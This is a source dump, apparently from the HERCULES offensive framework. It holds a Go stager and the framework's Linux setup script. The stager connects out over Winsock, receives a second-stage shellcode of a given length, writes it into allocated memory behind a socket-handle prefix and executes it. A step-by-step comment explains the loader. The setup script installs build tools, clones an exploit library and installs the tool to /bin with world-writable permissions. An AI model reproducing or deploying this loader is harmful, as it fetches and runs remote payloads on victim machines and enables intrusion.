38 | syscall.WSARecv(Socket, &WSA_Buffer, 1, &DataReceived, &UitnZero_1, nil, nil)
39 | Length_int := binary.LittleEndian.Uint32(Length[:])
40 | if Length_int < 100 {
41 | main()
42 | }
43 | Shellcode_Buffer := make([]byte, Length_int)
44 |
45 | var Shellcode []byte
46 | WSA_Buffer = syscall.WSABuf{Len: Length_int, Buf: &Shellcode_Buffer[0]}
47 | UitnZero_1 = uint32(0)
48 | DataReceived = uint32(0)
49 | TotalDataReceived := uint32(0)
50 | for TotalDataReceived < Length_int {
51 | syscall.WSARecv(Socket, &WSA_Buffer, 1, &DataReceived, &UitnZero_1, nil, nil)
52 | for i := 0; i < int(DataReceived); i++ {
53 | Shellcode = append(Shellcode, Shellcode_Buffer[i])
54 | }
55 | TotalDataReceived += DataReceived
56 | }
57 |
58 | Addr := Allocate(uintptr(Length_int + 5))
59 | AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr))
60 | SocketPtr := (uintptr)(unsafe.Pointer(Socket))
61 | AddrPtr[0] = 0xBF
62 | AddrPtr[1] = byte(SocketPtr)
63 | AddrPtr[2] = 0x00
64 | AddrPtr[3] = 0x00
65 | AddrPtr[4] = 0x00
66 | for BpuAKrJxfl, IIngacMaBh := range Shellcode {
67 | AddrPtr[BpuAKrJxfl+5] = IIngacMaBh
68 | }
69 | //RSE.Migrate(Addr, int(Length_int))
70 | syscall.Syscall(Addr, 0, 0, 0, 0)
71 | }
72 |
73 | /*
74 |
75 | 1. Create WSA DATA version 2.2
76 | 2. Create a WSA Socket
77 | 3. Create WSA Socket Address object
78 | 4. Connect
79 | 5. Create 4 byte second stage length array
80 | 6. Create a WSA Buffer object pointing second stage length array
81 | 7. Receive 4 bytes WSARecv to second stage length array
82 | 8. Convert second stage length to int
83 | 9. Create a byte array at the size of second stage byte array for second stage shellcode
84 | 10. Create a undefined byte array
85 | 11. Create another WSA buffer object pointing at second stage shellcode byte array
86 | 12. Construct a nested for loop that receives bytes and appends them into undefined byte array
87 | 13. Allocate space in memory at the size of (second stage shellcode + 5)
88 | 14. Create a pointer that points to WSA Socket
89 | 15. Assing 0xBF(mov edi) to fist byte of allocated memory
90 | 16. Assing WSA Socket pointer to second byte of allocated memory
91 | 17. Assing tree null bytes after second byte of allocated memory
92 | 18. Move shellcode bytes to allocated memory starting at fift byte
93 | 19. Make a syscall to allocated memory address
94 | */
95 |
--------------------------------------------------------------------------------
/Setup.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import "os/exec"
4 | import "strings"
5 | import "runtime"
6 | import "github.com/fatih/color"
7 | import "os"
8 |
9 |
10 |
11 |
12 |
13 | func main() {
14 |
15 |
16 |
17 | Green := color.New(color.FgGreen)
18 | BoldGreen := Green.Add(color.Bold)
19 | Yellow := color.New(color.FgYellow)
20 | BoldYellow := Yellow.Add(color.Bold)
21 | Red := color.New(color.FgRed)
22 | BoldRed := Red.Add(color.Bold)
23 | White := color.New(color.FgWhite)
24 | BoldWhite := White.Add(color.Bold)
25 |
26 | color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ")
27 | color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ")
28 | color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ")
29 | color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒")
30 | color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒")
31 | color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░")
32 | color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░")
33 | color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ")
34 | color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ")
35 | color.Red(" ░ ")
36 |
37 | color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]")
38 | BoldGreen.Println("+ -- --=[ Ege Balcı ]")
39 |
40 |
41 |
42 |
43 |
44 | Priv := CheckSUDO()
45 |
46 | BoldWhite.Println("\n\n[*] STARTING HERCULES SETUP \n")
47 |
48 |
49 | BoldYellow.Println("[*] Detecting OS...")
50 |
51 | if runtime.GOOS == "linux" {
52 |
53 |
54 | OsVersion, _ := exec.Command("sh", "-c", "uname -a").Output()
55 | BoldYellow.Println("[*] OS Detected : " + string(OsVersion))
56 | BoldYellow.Println("[*] Setting HERCULES path...")
57 |
58 |
59 | Path, _ := exec.Command("sh", "-c", "pwd").Output()
60 | BoldYellow.Println("[*] HERCULES_PATH="+string(Path))
61 | _Path := strings.Trim(string(Path), "\n")
62 | var HERCULES_PATH string = string("echo 'export HERCULES_PATH="+_Path+"' >> ~/.bashrc")
63 | exec.Command("sh", "-c", HERCULES_PATH).Run()
64 | exec.Command("sh", "-c", string("export HERCULES_PATH="+string(Path))).Run()
65 | if strings.Contains(string(OsVersion), "Ubuntu") || strings.Contains(string(OsVersion), "kali") {
66 | BoldYellow.Println("[*] Installing golang...")
67 | if Priv == false {
68 | BoldRed.Println("[!] ERROR : Setup needs root privileges")
69 | }
70 | Go := exec.Command("sh", "-c", "sudo apt-get install golang")
71 | Go.Stdout = os.Stdout
72 | Go.Stderr = os.Stderr
73 | Go.Stdin = os.Stdin
74 | Go.Run()
75 | BoldYellow.Println("[*] Installing upx...")
76 | UPX := exec.Command("sh", "-c", "sudo apt-get install upx")
77 | UPX.Stdout = os.Stdout
78 | UPX.Stderr = os.Stderr
79 | UPX.Stdin = os.Stdin
80 | UPX.Run()
81 | BoldYellow.Println("[*] Installing git...")
82 | Git := exec.Command("sh", "-c", "sudo apt-get install git")
83 | Git.Stdout = os.Stdout
84 | Git.Stderr = os.Stderr
85 | Git.Stdin = os.Stdin
86 | Git.Run()
87 |
88 | BoldYellow.Println("[*] Cloning EGESPLOIT Library...")
89 | exec.Command("sh", "-c", "cd src && git clone https://github.com/EgeBalci/EGESPLOIT.git").Run()
90 | exec.Command("sh", "-c", "export GOPATH=$HERCULES_PATH").Run()
91 | BoldYellow.Println("[*] Cloning color Library...")
92 | exec.Command("sh", "-c", "go get github.com/fatih/color").Run()
93 |
94 | exec.Command("sh", "-c", "cd SOURCE && go build HERCULES.go").Run()
95 |
96 | BoldYellow.Println("[*] Createing shoutcut...")
97 | exec.Command("sh", "-c", "sudo cp HERCULES /bin/").Run()
98 | exec.Command("sh", "-c", "sudo chmod 777 /bin/HERCULES").Run()
99 |
100 | }else if strings.Contains(string(OsVersion), "ARCH") || strings.Contains(string(OsVersion), "MANJARO") {
101 | //pacman -S package_name1
102 | BoldYellow.Println("[*] Installing golang...")
103 | BoldYellow.Println("[*] Installing golang...")
104 | if Priv == false {
105 | BoldRed.Println("[!] ERROR : Setup needs root privileges")
106 | }
107 | Go := exec.Command("sh", "-c", "pacman -S go")
108 | Go.Stdout = os.Stdout
109 | Go.Stderr = os.Stderr
110 | Go.Stdin = os.Stdin
111 | Go.Run()
112 | BoldYellow.Println("[*] Installing upx...")
113 | UPX := exec.Command("sh", "-c", "pacman -S upx")
114 | UPX.Stdout = os.Stdout
115 | UPX.Stderr = os.Stderr
116 | UPX.Stdin = os.Stdin
117 | UPX.Run()
118 | BoldYellow.Println("[*] Installing git...")
119 | Git := exec.Command("sh", "-c", "pacman -S git")
120 | Git.Stdout = os.Stdout
121 | Git.Stderr = os.Stderr
122 | Git.Stdin = os.Stdin
123 | Git.Run()
124 |
125 | BoldYellow.Println("[*] Cloning EGESPLOIT Library...")
126 | exec.Command("sh", "-c", "cd SOURCE && git clone https://github.com/EgeBalci/EGESPLOIT.git").Run()
127 | exec.Command("sh", "-c", "export GOPATH=$HERCULES_PATH").Run()
128 | BoldYellow.Println("[*] Cloning color Library...")
129 | exec.Command("sh", "-c", "go get github.com/fatih/color").Run()
130 |
131 | exec.Command("sh", "-c", "cd SOURCE && go build HERCULES.go").Run()
132 |
133 | BoldYellow.Println("[*] Createing shoutcut...")
134 | exec.Command("sh", "-c", "sudo cp HERCULES /bin/").Run()
135 | exec.Command("sh", "-c", "sudo chmod 777 /bin/HERCULES").Run()
136 |
137 | }else{
138 | BoldRed.Println("[!] ERROR : HERCULES does not support this OS")
139 | }
140 |
141 |
142 | Stat, Err := CheckValid()
143 |
144 | if Stat == false {
145 | BoldYellow.Println("\n")
146 | BoldRed.Println(Err)
147 | }else{
148 | BoldGreen.Println("\n\n[+] Setup completed successfully")
149 | exec.Command("sh", "-c", "gnome-terminal").Run()
150 | exec.Command("sh", "-c", "exit").Run()
151 | }
152 |
153 |
154 | }else if runtime.GOOS != "linux" {
155 | BoldRed.Println("[!] ERROR : HERCULES only supports linux distributions")
156 | }
157 |
158 | }
159 |
160 |
161 | func CheckValid() (bool, string){
162 |
163 | OutUPX, _ := exec.Command("sh", "-c", "upx").Output()
164 | if (!strings.Contains(string(OutUPX), "Copyright")) {
165 | return false, "[!] ERROR : upx is not installed"
166 | }
167 |
168 | OutGO, _ := exec.Command("sh", "-c", "go version").Output()
169 | if (!strings.Contains(string(OutGO), "version")) {
170 | return false, "[!] ERROR : golang is not installed"
171 | }
172 |
173 | OutBin, _ := exec.Command("sh", "-c", "cd /bin/ && ls").Output()
174 | if (!strings.Contains(string(OutBin), "HERCULES")) {
175 | return false, "[!] ERROR : Unable to create shoutcut "
176 | }
177 |
178 | return true, ""
179 |
180 | }
181 |
182 | func CheckSUDO() (bool){
183 | User, _ := exec.Command("sh", "-c", "whoami").Output()
184 | if strings.Contains(string(User), "root") {
185 | return true
186 | }else {
187 | return false
188 | }
189 |
190 | }
191 |
--------------------------------------------------------------------------------